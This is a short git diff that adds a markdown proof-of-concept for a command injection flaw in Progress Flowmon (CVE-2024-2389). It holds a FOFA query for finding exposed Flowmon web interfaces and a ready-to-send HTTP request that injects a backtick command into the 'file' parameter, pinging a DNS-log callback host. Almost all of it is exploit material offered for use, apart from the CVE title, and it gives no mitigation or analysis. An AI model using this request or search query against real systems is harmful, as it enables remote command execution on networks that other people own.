Create Progress-Flowmon命令注入漏洞(CVE-2024-2389).md

Progress-Flowmon命令注入漏洞(CVE-2024-2389).md

@@ -0,0 +1,19 @@
+## Progress-Flowmon命令注入漏洞(CVE-2024-2389)
+
+
+## fofa
+```
+body="Flowmon-Web-Interface"
+```
+
+
+## poc
+```
+GET /service.pdfs/confluence?lang=en&file=`ping+dnslog地址` HTTP/1.1
+Host: x.x.x.x
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15
+Connection: close
+Accept: */*
+Accept-Language: en
+Accept-Encoding: gzip
+```